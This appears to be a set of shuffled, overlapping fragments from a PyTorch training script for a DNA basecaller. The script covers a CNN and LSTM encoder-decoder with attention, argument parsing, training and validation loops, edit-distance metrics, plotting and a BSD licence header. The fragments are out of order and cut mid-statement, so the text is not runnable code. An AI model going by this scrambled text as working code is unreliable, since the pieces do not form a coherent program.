"m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2)",
"if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we",
"args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation = args.make_validation",
"np import os import sys import torch import torch.nn as nn from torch.autograd",
"following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice,",
"pack_padded_sequence so that padded items in the sequence won't be shown to the",
"3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit",
"save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\"",
"#clipping_value = 1 #arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(),",
"order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx = sorted_idx.view(-1, 1,",
"dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to check if it",
"seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in a",
"= hidden h = h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0),",
"loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val",
"+ 1)) * 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio=",
"parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget gate bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?',",
"reshaped_sorted_labels[notpadded_index] ).sum().item() / reshaped_sorted_labels[notpadded_index].size(0) epoch_acc += acc running_acc_train += acc acc_iteration.append(acc) #if editD:",
"LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention,",
"Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates]",
"as np import os import sys import torch import torch.nn as nn from",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv):",
"name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias != \"None\" and",
"2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in",
"HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder =",
"batch labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch,",
"'/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set",
"weight decay={}, clipping value={}, lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={},",
"num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train',",
"self.hidden: (a, b), where a and b both have shape (num_layers, batch_size, hidden_dim).",
"0).cuda(self.port) # (batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature)",
"\"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases =",
"max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size",
"model(inputs, seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous()",
"print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename))",
"parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\")",
"hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1,",
"dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2, dict_validation_editd2], [dict_activations_in, dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder,",
"{} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {}",
"# input for LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn",
"open(fname, \"w\") if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"= port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters():",
"requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length output_val, sorted_labels_val,",
"import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard",
"plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"the output layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim *",
"target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2",
"[batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False,",
"= attention self.dropout = dropout # Define the LSTM layer if self.bidirectional: if",
"IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE",
"= train_ds[4] read_train = train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y,",
"= target[idx] encoded_pred = [] for p in seq: if p == 4:",
"error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\") ax = fig.add_subplot(1,",
"type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11],",
"n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate",
"parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates evaluation on the validation set\")",
"not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 #",
"= encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :]",
"x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b,",
"earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val)",
"gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) #",
"input_decoder = label if teacher_force else onehot # [batch size, out dim] return",
"+ '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path +",
"!= \"None\" and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n",
"in p: n = matrix_param[p].shape[0] # input gate start, end = 0, n//4",
"from torch.autograd import Variable import torch.nn.functional as F import torchvision import pickle import",
"import seaborn as sns import pandas as pd import argparse from distutils.util import",
"your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader",
"if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim",
"= loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping:",
"acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"x out_size # Calculate cross entropy loss # output = (seq*batch, out dim),",
"sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val) total_ed += ed_val total_num_chars",
"as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from",
"{}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\")",
"parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)),",
"{}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable parameters\\n\".format(count_parameters(model12)))",
"teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio # put on position:",
"= divmod(rem, 60) print(\"=\" * 100) checkpoint = { 'updates': out12[-1], 'model': model12.state_dict(),",
"h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings",
"ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from torch.utils.data",
"-1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate",
"<gh_stars>0 #!/usr/bin/env python \"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights",
"dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss",
"nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std = 1.0 /",
"handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir +",
"plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if",
"default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability",
"= {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"}",
"length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3]))",
"{}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12))",
"data[4] #Wrap them in a Variable object inputs, labels, labels10 = Variable(batch_x, requires_grad=False),",
"validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance",
"updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates)",
"running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch:",
"ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation",
"nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio',",
"forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): #",
"0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator puts",
"size] = 32 is a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out]",
"in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end = n//4,",
"x out_size x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val,",
"train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size())",
"have shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length in descending",
"# (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim)",
"f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname",
"= val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val =",
"hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) #",
"print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation == 0:",
"reshaped_sorted_labels != 5 # indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long())",
"import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as",
"fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\")",
"1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def",
"dict_training_editd = {} dict_validation_editd = {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2",
"f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val],",
"input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping",
"= SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout =",
"default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0,",
"nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len,",
"else: label = y[:, :, i] # batch, features, seq len if self.attention:",
"########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target",
"* 30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss=",
"scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] =",
"OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as np",
"lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b), where a and",
"label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from",
"None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end =",
"from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim as optim from torch.utils.data import",
"dim] return outputs, hidden # Sequence to sequence model # ----------- class Seq2Seq(nn.Module):",
"torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied:",
"1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if reduce_lr: print(\"lr=",
"gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf:",
"lstm_out: [seq_len, batch, output_dim] # shape of self.hidden: (a, b), where a and",
"start, end): self.start = start self.end = end def __eq__(self, other): return self.start",
"= torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(),",
"input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param",
"= np.linalg.norm(m[start: end], ord=2) # output gate start, end = n//2 + n//4,",
"decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11 start",
"'--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in",
"\"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True,",
"pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure()",
"# Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate =",
"bidirectional self.port=port self.attention = attention self.dropout = dropout # Define the LSTM layer",
"port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std,",
"teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25:",
"ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF",
"parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\")",
"original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2",
"''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd += result num_chars",
"+ '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" ))",
"= c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x)",
"self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND",
"# ed = 0 # ed2 = old_ed # # old_ed = ed2",
"= random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target,",
"= train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size,",
"make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates)",
"zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax",
 0: # remove neagtive">
"> 0: # remove negative samples negative_idx = seq_len_cnn > 0 seq_len_cnn =",
"x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units',",
"[max. target length, batch size, output dim] top1 = input_decoder.argmax(1) # get argmax",
"val_set[4].size(), val_set[5].size()) # [batch size] is typically chosen between 1 and a few",
"help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers",
"default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\")",
"x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x,",
"default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5:",
"in y_len: if \"bias\" in name and \"lstm\" in name and \"linear\" not",
"optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch]",
"parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"features, seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i,",
"train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path +",
"<= 0.).sum().item() > 0: # remove neagtive samples negative_idx = seq_len_cnn > 0",
"total_ed += ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars",
"= np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss =",
"/ float(make_validation)) > 0.35 and teacher_forcing_ratio >= 0.25: # if we have reached",
"args.gradient_clip # LSTM hidden = args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder",
"{}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename,",
"= plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1)",
"= {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss =",
"output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define",
"original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return",
"SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port),",
"nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train,",
"= (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that",
"inputs, labels, labels10 = Variable(batch_x, requires_grad=False), Variable(batch_y, requires_grad=False), Variable(batch_y10, requires_grad=False) # batch_size x",
"oder batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False) #",
"== 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig,",
"= args.drop_prob call = args.call lr = args.learning_rate editD = args.editD sgd =",
"unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder # -----------",
"teacher_force else onehot # [batch size, out dim] return outputs, hidden # Sequence",
"of self.hidden: (a, b), where a and b both have shape (num_layers, batch_size,",
"loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc = 0 epoch_loss_val =",
"and \"linear\" not in name: for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name",
"polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from cnn import SimpleCNN,",
"label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\")",
"outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate)",
"in descending order #print(\"in length\", x_lengths) sorted_len, sorted_idx = x_lengths.sort(0, descending=True) index_sorted_idx =",
"in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS",
"* 100)) if reduce_lr: print(\"lr= \" + str(optimizer.param_groups[0]['lr'])) print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \",",
"plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input =",
"port = args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation",
"PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD)",
"* CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder # -----------",
"idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df",
", kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability,",
"CNN, lstm_encoder = lstm, lstm_decoder = lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters():",
"= pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set",
"batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:,",
"help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\",",
"\"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) #",
"[batch, seq_len, output_dim] # shape of self.hidden: (a, b), where a and b",
"OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY",
"for input x is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5,",
"seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())]",
"list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\")",
"plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax = fig.add_subplot(1, 3,",
"input[0], input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"# The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1):",
"# print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation ==",
